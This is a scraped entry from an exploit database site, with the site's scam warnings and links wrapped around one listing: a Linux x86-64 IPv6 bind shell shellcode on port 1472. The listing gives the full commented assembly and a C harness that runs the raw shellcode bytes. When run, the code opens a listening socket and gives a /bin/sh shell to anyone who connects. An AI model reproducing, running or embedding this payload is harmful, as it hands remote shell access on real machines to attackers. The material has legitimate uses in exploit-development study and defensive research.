0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)
/* # Title : Linux x86_64 bind tcp : port 1472 ipv6 # Date : 02/05/2016 # Author : Roziul Hasan Khan Shifat # Tested On : Ubuntu 14.04 LTS x86_64 # Contact : shifath12@gmail.com */ /* section .text global _start _start: ;;socket() xor rax,rax push 6 push 0x1 push 10 pop rdi pop rsi pop rdx mov al,41 ;socket() syscall ;------------------------------------ xor r15,r15 mov r15,rax ;storing socket descriptor ;-------------------- ;fork() xor rax,rax mov al,57 xor rdi,rdi syscall ;------------------- xor rdi,rdi cmp rax,rdi je ps ;------------- ;exit() xor rax,rax mov al,60 syscall ;-------------- ps: ;---------------- ;bind() xor rax,rax push byte 28 pop rdx ;sizeof struct sock_addrin6 push rax ;sin6_scope_id push rax ;sin6_addr push rax ;sin6_addr push rax ;sin6_flowinfo push word 0xc005 ;sin6_port (htons(1472)) (U may change it) push word 10 ;sin6_family push rsp pop rsi mov rdi,r15 ;scoket des mov al,49 syscall ;--------------------------------------- ;listen() mov rdi,r15 xor rsi,rsi add rsi,2 xor rax,rax mov al,50 syscall ;------------------------------------ ;accept() xor r9,r9 xor rdx,rdx xor rsi,rsi xor rax,rax mov rdi,r15 mov dl,28 mov al,43 syscall ;------------------ mov r9,rax ;storing client descriptor ;------------------- ;close() closing socket descriptor xor rax,rax mov rdi,r15 mov al,3 syscall ;------------------ ;;dup2(cd,0) xor rsi,rsi mul rsi mov rdi,r9 mov al,33 syscall ;------------ ;------------------ ;;dup2(cd,1) xor rax,rax inc rsi mov rdi,r9 mov al,33 syscall ;------------ ;------------------ ;;dup2(cd,2) xor rax,rax inc rsi mov rdi,r9 mov al,33 syscall jmp exe ;------------ exe: ;exeve(//bin/sh) xor rdx,rdx xor rsi,rsi xor rdi,rdi mul rdi mov r10, 0x68732f6e69622f2f shr r10,8;shift right 8 bit push r10 push rsp pop rdi mov al,59 syscall */ #include<stdio.h> #include<string.h> char shellcode[] ="\x48\x31\xc0\x6a\x06\x6a\x01\x6a\x0a\x5f\x5e\x5a\xb0\x29\x0f\x05\x4d\x31\xff\x49\x89\xc7\x48\x31\xc0\xb0\x39\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\x48\x31\xc0\x6a\x1c\x5a\x50\x50\x50\x50\x66\x68\x05\xc0\x66\x6a\x0a\x54\x5e\x4c\x89\xff\xb0\x31\x0f\x05\x4c\x89\xff\x48\x31\xf6\x48\x83\xc6\x02\x48\x31\xc0\xb0\x32\x0f\x05\x4d\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xc0\x4c\x89\xff\xb2\x1c\xb0\x2b\x0f\x05\x49\x89\xc1\x48\x31\xc0\x4c\x89\xff\xb0\x03\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\xeb\x00\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\xf7\xe7\x49\xba\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xea\x08\x41\x52\x54\x5f\xb0\x3b\x0f\x05"; main() { printf("shellcode length %ld\n",(unsigned long)strlen(shellcode)); (* (int(*)()) shellcode) (); return 0; } # 0day.today [2024-09-28] #